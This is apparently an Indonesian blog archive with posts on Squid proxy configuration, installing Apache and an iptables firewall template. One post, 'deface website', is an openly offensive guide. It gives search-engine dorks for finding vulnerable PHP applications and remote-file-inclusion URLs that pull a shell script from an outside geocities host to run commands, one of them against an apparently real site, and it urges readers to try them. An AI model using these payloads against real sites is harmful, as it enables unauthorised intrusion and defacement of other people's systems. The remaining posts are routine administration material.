Posted by: lathifulamri | December 18, 2007

DASAR SQUID

Salah satu contoh aplikasi proxy/cache server adalah Squid. Squid dikenal sebagai aplikasi proxy dan cache server yang handal. Pada pihak klien bekerja aplikasi browser yang meminta request http pada port 80. Browser ini setelah dikonfigurasi akan meminta content, yang selanjutnya disebut object, kepada cache server, dengan nomor port yang telah disesuaikan dengan milik server, nomor yang dipakai bukan port 80 melainkan port 8080 3130 (kebanyakan cache server menggunakan port itu sebagai standarnya).

Pada saat browser mengirimkan header permintaan, sinyal http request dikirimkan ke server. Header tersebut diterima squid dan dibaca. Dari hasil pembacaan, squid akan memparsing URL yang dibutuhkan, lali URL ini dicocokkan dengan database cache yang ada.

Database ini berupa kumpulan metadata (semacam header) dari object yang sudah ada didalam hardisk. Jika ada, object akan dikirimkan ke klien dan tercatat dalam logging bahwa klien telah mendapatkan object yang diminta. Dalam log kejadian tersebut akan dicatat sebagai TCP_HIT. Sebaliknya, jika object yang diminta ternyata tidak ada, squid akan mencarinya dari peer atau langsung ke server tujuan. Setelah mendapatkan objectnya, squid akan menyimpan object tersebut ke dalam hardisk. Selama dalam proses download object ini dinamakan “object in transit” yang sementara akan menghuni ruang memori. Dalam masa download tadi, object mulai dikirimkan ke klien dan setelah selesai, kejadian ini tercatat dalam log sebagai TCP_MISS.

ICP sebagai protokol cache berperan dalam menanyakan ketersediaan object dalam cache. Dalam sebuah jaringan sebuah cache yang mempunyai sibling, akan mencoba mencari yang dibutuhkan ke peer sibling lainnya, bukan kepada parent, cache akan mengirimkan sinyal icp kepada sibling dan sibling membalasnya dengan informasi ketersediaan ada atau tidak. Bila ada, cache akan mencatatkan ICP_HIT dalam lognya. Setelah kepastian object bias diambil dari sibling, lalu cache akan mengirimkan sinyal http ke sibling untuk mengambil object yang dimaksud. Dan setelah mendapatkannya, cache akan mencatat log SIBLING_HIT.

Jika ternyata sibling tidak menyediakan object yang dicari, cache akan memintanya kepada parent. Sebagai parent, ia wajib mencarikan object yang diminta tersebut walaupun ia sendiri tidak memilikinya (TCP_MISS). Setelah object didapatkan dari server origin, object akan dikirimkan ke cache child tadi, setelah mendapatkannya cache child akan mencatatnya sebagai PARENT_HIT.

II.1 Konfigurasi, penggunaan dan metode Squid

Konfigurasi-konfigurasi mendasar squid antara lain :

1. http_port nomor port.
Ini akan menunjukkan nomor port yang akan dipakai untuk menjalankan squid. Nomor port ini akan dipakai untuk berhubungan dengan klien dan peer.

2. icp_port nomor port.
Ini akan menunjukkan nomor port yang akan dipakai untuk menjalankan squid. Nomor port ini akan dipakai untuk berhubungan dengan klien dan peer.

3. cache_peer nama_peer tipe_peer nomor_port_http nomor_port_icp option.
Sintask dari cache peer ini digunakan untuk berhubungan dengan peer lain, dan peer lain yang dikoneksikan ini tipenya bergantung dari tipe peer yang telah dideklarasikan ini, bias bertipe sibling maupun bertipe parent,dan port yang digunakan untuk hubungan ICP maupun HTTP juga dideklarasikan disini, sedangakan untuk parameter option disini ada bermacam-macam salah satunya adalah default yang berarti dia adalah satu-satunya parent yang harus dihubungi (jika bertipe parent) dan proxy-only yang berarti bahwa object yang dipata dari peer tersebut tidak perlu disimpan dalam hardisk local.

4. Dead_peer_timeout jumlah_detik seconds.
Masing-masing peer yang telah didefinisikan sebelumnya mempunyai waktu timeout sebesar yang ditentukan dalam konfigurasi ini, Jika peer tidak menjawab kiriman sinyal ICP dalam batas waktu yang telah ditentukan, peer akan dianggap tidak akan dapat dijangkau, dan cache server tidak akan mengambil object dari server yang bersangkutan dalam interval waktu tertentu.

5. Hierarcy_stoplist pola1 pola2
Sintaks ini digunakan untuk menyatakan apa yang harus tidak diminta dari peer, melainkan harus langsung dari web server origin, jika pola1 dan pola 2 adalah parameter cgi-bin, ?, dan lain-lain maka jika ada request URL yang mengandung karakter tersebut maka akan diambilkan langsung ke server origin.

6. Cache_mem jumlah_memori (dalam bytes)
Sintaks ini akan menentukan batas atas jumlah memori yang digunakan untuk menyimpan antara lain : intransit object yaitu object yang dalam masa transisi antara waktu cache mendownload sampai object disampaikan ke klien, dan hot object, yaitu object yang sering diakses.

7. Cache_swap_low/high jumlah (dalam persen)
Squid akan menghapus object yang ada didalam hardisknya jika media tersebut mulai penuh. Ukuran penuh ini yang diset pada cache_swap_low dan cache_swap_high. Bila batas swap_low telah tercapai maka squid mulai menghapus dan jika batas swap_high tercapai maka squid akan semakin sering menghapus.

8. Cache_dir jenis_file_sistem direktori kapasitas_cache dir_1 jumlah dir_2
Sintaks ini akan menjelaskan direktori cache yang dipakai, pertama adalah jenis file sistemnya, lalu didirektori mana cache tersebut akan disimpan, selanjutnya ukuran cache tersebut dalam MegaBytes lalu jumlah direktori level 1 dan direktori level 2 yang akan digunakan squid untuk menyimpan objectnya.

II.1.1 ACL (Access Control List)

Berikut ini adalah control list yang akan digunakan untuk mengatur control dari ACL, control list tersebut antara lain :
– http_access
memperbolehkan acess http
– icp_access
memperbolehkan peer untuk mengirimkan icp untuk menquery object
– miss_access
memperbolehkan klien meminta object yang belum ada (miss) didalam cache
– no_cache
object yang diminta klien tidak perlu disimpan ke hardisk
– always_direct
permintaan yang ditangani langsung ke server origin
– never direct
permintaan yang ditangani secara tidak langsung ke server origin.

Sebagai contoh diberikan sintaks konfigurasi ACL seperti dibawah ini :
#bagian ACL
ACL localnet src 192.168.100.0/24
ACL localkomp 127.0.0.1/255.255.255.255
ACL isp dst 202.59.206.65/30
ACL allsrc src 0.0.0.0/0.0.0.0
ACL alldst dst 0.0.0.0/0
ACL other src 10.10.11.11/32
ACL domainku srcdomain .jatara.net
#bagian control list
http_access deny other
http_access allow localnet
http_access allow lokalkomp
http_access allow domainku
http_access deny allsrc
always_direct allow isp
always_direct deny alldst

Pada konsep sintaks konfigurasi squid adalah bahwa sesuatu yang telah dieksekusi pada baris yang lebih atas maka dia tidak dieksekusi lagi dibaris yang paling bawah, walaupun dalam parameter ACL yang dibawah tersebut dia juga termasuk, untuk lebih jelasnya, jika ada IP Address 192.168.100.0/24 maka IP Address yang berkisar dari 192.168.100.1 – 192.168.100.254 (ACL localnet) telah diijinkan untuk mengakses http yang ditunjukkan oleh http_access allow localnet, dan dibawahnya ada ACL allsrc yang itu adalah mencakup semua daftar IP Address dan ACL itu tidak diperbolehkan mengakses http, yaitu http_access_deny allsrc, tapi karena pada ACL localnet dia telah dieksekusi untuk sebagai IP Address yang boleh mengakses, maka walaupun dibaris bwahnya di dieksekusi lagi, itu tidak akan berpengaruh,hal-hal seperti itu digunakan untuk seorang administrator cache server untuk melakukan pengontrolan agar tidak akan terlalu detail melakukan pengaturan jika baris atas dan bawah sama-sama saling mempengaruhi.

II.1.2 Object Cache

Pengaturan object sebuah cache server merupakan salah satu hal yang perlu diperhatikan disini. Telah diketahui sebelumnya bahwa object disimpan pada dua level cache_dir yang besar levelnya didefinisikan pada konfigurasi utama squid. Object itu sendiri berisikan content URL yang diminta klien dan disimpan dalam bentuk file binary, masing-masing object mempunyai metadata yang sebagian dari isinya disimpan didalam memori untuk memudahkan melacak dimana letak object dan apa isi dari object tersebut. Banyak sifat-sifat yang perlu diamati untuk optimasi squid ini, antara lain :

Umur object
Umur obect merupakan sebuah ukuran waktu yang dihabiskan sebuah object untuk tinggal didalam hardisk cache. Umur object dibatasi oleh beberapa factor, yaitu :

metode penghapusan object
object dihapus bisa melalui beberap algoritma penghapusan :
a. Logistic Regression :
yaitu menghapus object dengan kemungkinan logistic regression terkecil. Kemungkinan logistic regression bisa diartikan sebagai besarnya kemungkinan object tersebut akan diakses diwaktu yang akan dating.

b. Least Recently Used :
yaitu metode penghapusan object berdasarkan waktu kapan object tersebut terakhir diakses. Semakin lama (besar) waktunya, kemungkin dihapus juga akan semakin besar.

c. Least Frequently Used :
Metode penghapusan object yang paling jarang diakses.

d. First In First Out :
Penghapusan yang merunut metode berdasarkan waktu masuk ke dalam cache_dir, yaitu object yang paling awal masuk, berarti itu adalah object yang akan dihapus terlebih dahulu.

e. Random :
Menghapus object secara random.

Kapasitas hardisk cache
Semakin besar kapasitas cache, berarti semakin lama umur object tersebut bisa disimpan, jika pemakaian hardisk sudah mendekati batas atas (cache_swap_high) penghapusan akan semakin sering dilakukan.

II.2 KONFIGURASI DAN IMPLEMENTASI

Diasumsikan instalasi telah selesai dan tidak terdapat kesalahan, langkah berikutnya adalah mengatur konfigurasi squid, bukalah file /etc/squid.conf dengan editor teks favorit anda (vi, pico, dll), file ini merupakan file konfigurasi squid.

Carilah baris yang berisi perintah berikut :

# http_port 3128

Perintah ini akan membuat proxy HTTP menggunakan port 3128 yang merupakan port default untuk squid. Aktifkan dengan menghilangkan tanda #. Anda dapat membuat nilai port HTTP proxy ini sesuai dengan selera anda, tetapi jangan arahkan ke port 80, terutama jika anda juga menjalankan Web Server, karena Web Server juga memakai port tersebut.
#cache_mem 8 MB

Perintah tersebut digunakan untuk membatasi banyaknya memori komputer yang akan digunakan squid untuk menyimpan sementara obyek-obyek yang di cache. Batasan ini tidak ketat, suatu waktu jika squid membutuhkan memori lebih, dia dapat menggandakan memori yang dipakainya. Aktifkan baris ini dan ubahlah ukuran cache ini menjadi sebanyak yang anda inginkan, yang harus anda pertimbangkan adalah banyaknya memori yang dimiliki oleh komputer anda.
Kemudian:
# cache_access_log /var/log/squid/access.log
# cache_log /var/log/squid/cache.log
# cache_store_log /var/log/squid/store.log
Berikutnya, carilah baris yang berisi perintah berikut :

# LOGFILE PATHNAMES & CACHE DIRECTORIES
# ————————————-
Setting berikut ini digunakan untuk mendefinisikan alokasi penyimpanan web cache kita. Setting yang pertama adalah :

#cache_dir /var/squid/cache 100 16 256

Nilai yang ada diatas adalah nilai default squid, jika anda ingin merubahnya maka aktifkan perintah ini.

Parameter pertama /var/squid/cache adalah nama direktori tempat kita akan menyimpan file-file cache. Anda dapat mengubah parameter ini ke direktori manapun, tetapi yang harus diperhatikan squid tidak akan menciptakan direktori baru, jadi bila parameter ini akan diubah, pastikan direktori tujuannya sudah ada dan squid mempunyai hak akses untukmenulis pada direktori tersebut.

Parameter selanjutnya, yang bernilai 100 adalah banyaknya ruang pada hard disk (dengan satuan Mega Byte) yang akan digunakan squid untuk menyimpan file-file cache nya. Ubahlah sesuai dengan kebutuhan anda.

Parameter selanjutnya, disebut dengan Level-1, adalah banyaknya direktori yang akan dibuat oleh squid dalam direktori cache nya. Sebaiknya penulis menyarankan untuk tidak mengubah parameter ini.

Parameter terakhir, yang disebut dengan Level-2, adalah banyaknya direktori level kedua, yaitu direktori yang dibuat di dalam tiap direktori level pertama diatas.

Langkah berikutnya, carilah perintah berikut :

# ACCESS CONTROLS
# ——————–
Baris perintah berikut ini digunakan untuk mendefinisikan daftar hak akses dalam jaringan anda, squid menyebutnya dengan Access Control Lists (ACL). Anda dapat mendefinisikan beberapa ACL disini. Dalam bagian access controls ini, carilah baris perintah berikut :

#Recommended minimum configuration:
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl to_localhost dst 127.0.0.0/8
acl SSL_ports port 443 563
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp

acl Safe_ports port 443 563 # https, snews
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
dibawah acl localhost src 127.0.0.1/255.255.255.255, tambahkan network yang akan di allowed
acl jar1 src 172.17.3.0/255.255.255.0
setelah itu supaya net1 dan net2 td bisa mengakses squid maka tambahkan http_access allow
cari baris :
# And finally deny all other access to this proxy
http_access allow localhost
http_access deny all
diantara http_access allow localhost dan http_access deny all tambahkan :
http_access allow jar1
baris ini bisa diletakkan di atas http_access allow localhost atau dibawah http_access allow localhost yang penting diatas http_access deny all
setelah itu simpan. lalu start squid nya
[root@b301 ~]#squid –z ( hanya sekali pada saat pertama kali seting )
[root@b301 ~]#/etc/init.d/squid start ( setiap kali akan menjalankan squid )
setelah itu gunakan testing squidnya menggunakan browser sambil di lihat acess log nya
[root@b301 ~]#tail -f /home/cache/squid/acces

Posted by: lathifulamri | December 18, 2007

Konfigurasi Apache Web Server Untuk Linux

Source program : apache_1.3.14.tar.gz
Proses Installasi :

tar -xvzf apache_1.3.14.tar.gz
cd apache_1.3.14

Untuk melihat cara melakukan konfigurasi sebelum penginstallan :

./configure –help

Sebelum menjalankan perintah configure sebaiknya matikan dulu service httpd dengan perintah :

/etc/rc.d/init.d/httpd stop

Atau dengan melakukan langkah berikut :

setup
system services

dan nonaktifkan httpd

Buat user dan group untuk menjalankan apache
Tambahkan baris berikut pada file /etc/passwd

www:x:98:98:/:

Tambahkan baris berikut pada file /etc/group

www:x:98

Setup apache

mkdir /home/apache –> home direktori untuk apache
./configure –prefix=/home/apache –server-uid=www –server-gid=www
make
make install

Apache sudah terinstall pada direktori /home/apache

/home/apache/bin : berisi file-file binary
/home/apache/conf : berisi file-file konfigurasi yang terdiri dari :
* httpd.conf
* access.conf
* srm.conf
* magic
/home/apache/cgi-bin : merupakan direktori yang akan kita isikan dengan file cgi yang dibuat.
/home/apache/htdocs : berisi data-data untuk web site kita.
/home/apache/logs : berisi file-file log
Untuk menghidupkan service httpd, dilakukan dengan perintah :

/home/apache/bin/apachectl start

Agar service ini bisa langsung dijalankan pada waktu sistem boot maka cukup dengan menambahkan perintah tersebut di atas pada file /etc/rc.d/rc.local

Posted by: lathifulamri | December 18, 2007

iptables for single host

Konfigurasi IPTABLES berikut ini
merupakan template yang dapat diadaptasikan
sesuai dengan kondisi jaringan dimana
host tersebut diletakkan, walaupun
filtering didefinisikan untuk single
host (non-ip-forwarding), namun rule-rule
dibawah ini dapat dimodifikasi untuk
host yang berfungsi sebagai router juga.

Beberapa garis besar alur filtering sbb:

Inisialisasi:
– enable-kan beberapa parameter kernel untuk
DoS, Spoofs, Reverse Path Filter dan Redirect.
– default DROP untuk INBOUND dan FORWARDING
(untuk OUTBOUND opsional, tergantung dari
faktor keamanan dan kenyamanan).
– Flush semua rule dan hapus hand-made chains
terlebih dahulu.
– Buat chain baru yang dibutuhkan untuk pengorganisasian
rule filters.

Filtering:
– accept packet from loopback unconditionally
– block fragmented packets
– check packet that was sent for scanning purposes, block them.
– block rfc3330 address space (IANA Special use IPv4 Addresses)
– check packet that comes from our own defined blacklist
(if portsentry is installed, put those blacklist here), every
listed IP addresses will goes to blackhole
– icmp packets goes in another chain (ICMP), allow only few icmp
with rate limiting
– block invalid state, that doesn’t belong to any existing
connection
– pass in packets destined to opened services to another chains
– pass in established packets
– pass in packet to few udp port used by traceroute

Chains:
– iana, defined rfc3330 address space that should be blocked
– scan, filters that collected from actual scan performed by nmap
– icmp, allow only:
pong (echo reply) ICMP code = 0,
dest-unreach () ICMP code = 3,
source-quench (path mtu discovery) ICMP code = 4,
ping (echo request) ICMP code = 8,
time-exceeded (TTL expiry used by traceroute) ICMP code = 11,
parameter-problem () ICMP code = 12
– open, contains allowed ports/services, _might_need_a_bit_tweaks_here!
– blog, log to syslog and block
– ipsd and psd, ipsd is empty on startup, new entry _should_ be
jump’ed to psd chain, on psd chain all packets will be logged
to syslog and blocked

Referensi:
[x] Netfilter
http://netfilter.samba.org

[x] FAQ: Firewall Forensics
http://www.robertgraham.com/pubs/firewall-seen.html

[x] Rob Thomas, Documentation Collection
http://www.cymru.com/Documents/index.html

Todo:
– Iptables for routers?

======================================================================

# save as rc.firewall, and run it afterwards,
# execute “/sbin/service iptables save” to save
# it permanently under /etc/sysconfig/iptables

#!/bin/sh
#
# Linux Iptables
# configured specifically for single host
# note: snapshot of ‘iptables -L’ attached at the end
#
# Tue Nov 19 08:58:16 JAVT 2002 oblek@lug.stikom.edu
# Configured specifically for lug.stikom.edu
#
# Tue Feb 10 15:41:21 WIT 2004 diyan@mitra.net.id
# Modified as template
#

PATH=/sbin:/usr/sbin

# Modify appropriately
NETWORK=”XXX.XXX.XXX”
IP=”XXX”

###### INIT BEGIN ###############################################

# /usr/src/linux/Documentation/networking/ip-sysctl.txt — READ IT!
echo “1” > /proc/sys/net/ipv4/tcp_syncookies
echo “1” > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo “0” > /proc/sys/net/ipv4/conf/all/accept_source_route
echo “0” > /proc/sys/net/ipv4/conf/all/send_redirects
echo “0” > /proc/sys/net/ipv4/conf/all/accept_redirects
echo “1” > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
echo “1” > /proc/sys/net/ipv4/conf/all/log_martians

for x in /proc/sys/net/ipv4/conf/*/rp_filter; do
echo 1 > $x
done

# default deny stances,
# everything that is not explicitly allowed is blocked
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT

# flush all rules first
iptables -F

# delete hand-made chains
iptables -X

# every packet is interrogated in IANA room
iptables -N IANA

# blacklist tests, hint: portsentry entries
iptables -N IPSD
iptables -N PSD

# SCAN checks chain
iptables -N SCAN

# Allowed services chain
iptables -N OPEN

# block and log
iptables -N BLOG

# icmp packets goes in another chain
iptables -N ICMP

###### INIT END ##################################################

##### BUCKLE UP!!! FASTEN YOUR SEATBELT ##########################
# loopback is good
iptables -A INPUT -i lo -j ACCEPT

# block fragmented packets
iptables -A INPUT -f -j BLOG

# check for crafted scan packets
iptables -A INPUT -j SCAN

# IANA then IPSD
iptables -A INPUT -j IANA
iptables -A INPUT -j IPSD
iptables -A INPUT -p icmp -j ICMP

# where do you think you’re going?
iptables -A INPUT -m state –state INVALID -j BLOG

# knock, knock…
iptables -A INPUT -j OPEN

# packet that we initiated and already pass the filters
iptables -A INPUT -p tcp -m state –state RELATED -j ACCEPT
iptables -A INPUT -p tcp -m state –state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp -m state –state RELATED,ESTABLISHED –sport 53 -j ACCEPT
iptables -A INPUT -p udp -m state –state RELATED,ESTABLISHED –sport 53 -j ACCEPT
iptables -A INPUT -p udp -m state –state RELATED,ESTABLISHED –sport 161 -j ACCEPT

#### IANA ########################################################

# IANA interrogation chains (rfc3330)
iptables -A IANA -s 10.0.0.0/8 -j BLOG
iptables -A IANA -i ! lo -s 127.0.0.0/8 -j BLOG
iptables -A IANA -s 172.16.0.0/12 -j BLOG
iptables -A IANA -s 192.168.0.0/16 -j BLOG
#
iptables -A IANA -s 14.0.0.0/8 -j BLOG
iptables -A IANA -s 24.0.0.0/8 -j BLOG
iptables -A IANA -s 39.0.0.0/8 -j BLOG
iptables -A IANA -s 128.0.0.0/16 -j BLOG
iptables -A IANA -s 169.254.0.0/16 -j BLOG
iptables -A IANA -s 191.255.0.0/16 -j BLOG
iptables -A IANA -s 192.0.2.0/24 -j BLOG
iptables -A IANA -s 192.88.99.0/24 -j BLOG
iptables -A IANA -s 192.18.0.0/15 -j BLOG
iptables -A IANA -s 223.255.255.0/24 -j BLOG
iptables -A IANA -s 224.0.0.0/4 -j BLOG
iptables -A IANA -s 240.0.0.0/4 -j BLOG

# smurf, broadcast and network address
iptables -A IANA -s 255.255.255.255 -j BLOG
iptables -A IANA -s ${NETWORK}.0/32 -j BLOG
iptables -A IANA -s ${NETWORK}.255/32 -j BLOG

#### SCAN ########################################################

# block insane/stealthy packet behaviour
iptables -A SCAN -p tcp –tcp-flags SYN,ACK,FIN,RST RST -m limit –limit 1/s -j ACCEPT
iptables -A SCAN -p tcp –tcp-flags SYN,RST SYN,RST -m limit –limit 1/s -j BLOG
iptables -A SCAN -p tcp –tcp-flags SYN,FIN SYN,FIN -m limit –limit 1/s -j BLOG
iptables -A SCAN -p tcp –tcp-flags SYN,ACK,FIN,RST FIN -m limit –limit 1/s -j BLOG
iptables -A SCAN -p tcp –tcp-flags ALL NONE -m limit –limit 1/s -j BLOG
iptables -A SCAN -p tcp –tcp-flags ALL ALL -m limit –limit 1/s -j BLOG
iptables -A SCAN -p tcp –tcp-flags ALL FIN,URG,PSH -m limit –limit 1/s -j BLOG
iptables -A SCAN -p tcp –tcp-flags ALL FIN,SYN,URG,PSH -m limit –limit 1/s -j BLOG

# lssr, sssr
# http://www.google.com/search?q=loose+source+routing+block
iptables -A SCAN -p tcp –tcp-option 64 -m limit –limit 1/s -j BLOG
iptables -A SCAN -p tcp –tcp-option 128 -m limit –limit 1/s -j BLOG

#### ICMP ########################################################

# these, are considered harmless if not overdozed 🙂
iptables -A ICMP -p icmp –icmp-type pong -j ACCEPT
iptables -A ICMP -p icmp –icmp-type destination-unreachable -j ACCEPT
iptables -A ICMP -p icmp –icmp-type source-quench -j ACCEPT
iptables -A ICMP -p icmp –icmp-type ping -j ACCEPT
iptables -A ICMP -p icmp –icmp-type time-exceeded -j ACCEPT
iptables -A ICMP -p icmp –icmp-type parameter-problem -j ACCEPT
iptables -A ICMP -p icmp -m limit –limit 1/sec -j LOG –log-prefix “[ICMP] ”
iptables -A ICMP -p icmp -j DROP

#### OPEN ########################################################

# kids and pets are ok
iptables -A OPEN -p tcp –syn –dport ftp -j ACCEPT
iptables -A OPEN -p tcp –syn –dport ssh -j ACCEPT
iptables -A OPEN -p tcp –syn –dport telnet -j ACCEPT
iptables -A OPEN -p tcp –syn –dport smtp -j ACCEPT
iptables -A OPEN -p tcp –syn –dport http -j ACCEPT
iptables -A OPEN -p tcp –syn –dport pop3 -j ACCEPT
iptables -A OPEN -p tcp –syn –dport auth -j ACCEPT
iptables -A OPEN -p tcp –syn –dport imap -j ACCEPT
iptables -A OPEN -p tcp –syn –dport smux -j ACCEPT
iptables -A OPEN -p tcp –syn –dport https -j ACCEPT
iptables -A OPEN -p tcp –syn –dport mysql -s ! ${NETWORK}.${IP} -j BLOG
iptables -A OPEN -p udp –dport domain -j ACCEPT
iptables -A OPEN -p udp –dport snmp -j ACCEPT

# allow traceroute to works
iptables -A OPEN -p udp -m state –state NEW –dport 33343:33690 -j ACCEPT

#### BLOG ########################################################

# log to syslog and drop it to the floor
iptables -A BLOG -m limit –limit 1/s -j LOG –log-prefix “[WARN] ”
iptables -A BLOG -p tcp -j REJECT –reject-with tcp-reset
iptables -A BLOG -j DROP

#### PSD #########################################################

# going to blackhole Mr. Jones?
iptables -A PSD -m limit –limit 1/s -j LOG –log-prefix “[PSD] ”
iptables -A PSD -p tcp -j REJECT –reject-with tcp-reset
iptables -A PSD -j DROP

#### MISC ########################################################

# take the pills and shut up!
#iptables -A OUTPUT -m owner –gid-owner 5154 -p tcp –dport 21 -j REJECT
#iptables -A OUTPUT -m owner –gid-owner 5154 -p tcp –dport 80 -j REJECT

############## see it for yourself, how it flows ###############################
#
# Chain INPUT (policy DROP)
# target prot opt source destination
# ACCEPT all — anywhere anywhere
# BLOG all -f anywhere anywhere
# SCAN all — anywhere anywhere
# IANA all — anywhere anywhere
# IPSD all — anywhere anywhere
# ICMP icmp — anywhere anywhere
# BLOG all — anywhere anywhere state INVALID
# OPEN all — anywhere anywhere
# ACCEPT tcp — anywhere anywhere state RELATED
# ACCEPT tcp — anywhere anywhere state ESTABLISHED
# ACCEPT tcp — anywhere anywhere state RELATED,ESTABLISHED tcp spt:domain
# ACCEPT udp — anywhere anywhere state RELATED,ESTABLISHED udp spt:domain
#
# Chain FORWARD (policy DROP)
# target prot opt source destination
#
# Chain OUTPUT (policy ACCEPT)
# target prot opt source destination
#
# Chain BLOG (19 references)
# target prot opt source destination
# LOG all — anywhere anywhere limit: avg 1/sec burst 5 LOG level warning prefix `[WARN] ‘
# REJECT tcp — anywhere anywhere reject-with tcp-reset
# DROP all — anywhere anywhere
#
# Chain IANA (1 references)
# target prot opt source destination
# BLOG all — 10.0.0.0/8 anywhere
# BLOG all — 127.0.0.0/8 anywhere
# BLOG all — 172.16.0.0/12 anywhere
# BLOG all — 192.168.0.0/16 anywhere
# BLOG all — 255.255.255.255 anywhere
# BLOG all — 202.43.252.0 anywhere
# BLOG all — 202.43.252.255 anywhere
#
# Chain ICMP (1 references)
# target prot opt source destination
# ACCEPT icmp — anywhere anywhere icmp echo-reply
# ACCEPT icmp — anywhere anywhere icmp destination-unreachable
# ACCEPT icmp — anywhere anywhere icmp source-quench
# ACCEPT icmp — anywhere anywhere icmp echo-request
# ACCEPT icmp — anywhere anywhere icmp time-exceeded
# ACCEPT icmp — anywhere anywhere icmp parameter-problem
# LOG icmp — anywhere anywhere limit: avg 1/sec burst 5 LOG level warning prefix `[ICMP] ‘
# DROP icmp — anywhere anywhere
#
# Chain IPSD (1 references)
# target prot opt source destination
#
# Chain OPEN (1 references)
# target prot opt source destination
# ACCEPT tcp — anywhere anywhere tcp dpt:ftp flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:ssh flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:telnet flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:smtp flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:http flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:pop3 flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:auth flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:imap flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:smux flags:SYN,RST,ACK/SYN
# ACCEPT tcp — anywhere anywhere tcp dpt:https flags:SYN,RST,ACK/SYN
# BLOG tcp — !adamantium.mitra.net.id anywhere tcp dpt:mysql flags:SYN,RST,ACK/SYN
# ACCEPT udp — anywhere anywhere udp dpt:domain
# ACCEPT udp — anywhere anywhere udp dpt:snmp
# ACCEPT udp — anywhere anywhere state NEW udp dpts:33343:33690
#
# Chain PSD (0 references)
# target prot opt source destination
# LOG all — anywhere anywhere limit: avg 1/sec burst 5 LOG level warning prefix `[PSD] ‘
# REJECT tcp — anywhere anywhere reject-with tcp-reset
# DROP all — anywhere anywhere
#
# Chain SCAN (1 references)
# target prot opt source destination
# ACCEPT tcp — anywhere anywhere tcp flags:FIN,SYN,RST,ACK/RST limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp flags:SYN,RST/SYN,RST limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp flags:FIN,SYN/FIN,SYN limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp flags:FIN,SYN,RST,ACK/FIN limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/NONE limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/FIN,SYN,RST,PSH,ACK,URG limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/FIN,PSH,URG limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp flags:FIN,SYN,RST,PSH,ACK,URG/FIN,SYN,PSH,URG limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp option=64 limit: avg 1/sec burst 5
# BLOG tcp — anywhere anywhere tcp option=128 limit: avg 1/sec burst 5

Posted by: lathifulamri | December 12, 2007

deface website

Saya ingin berbagi pengalaman tentang nge-Deface dan berbagai command command yang bermanfaat bagi kita didalam nge-Deface..

Oke deh ga perlu berpanjang lebar apa itu DEFACE…. wong kita cuman mempelajari bagaimana caranya masuk ke dalam web seseorang yang didalamnya terdapat BUG atau kesalahan kesalahan yang terdapat pada Script atau Link nya..

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk
tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

– Oneadmin

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:.net
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

– PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname%20-a;cd;pwd

– Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..

Posted by: lathifulamri | December 12, 2007

PENERAPAN WIMAX

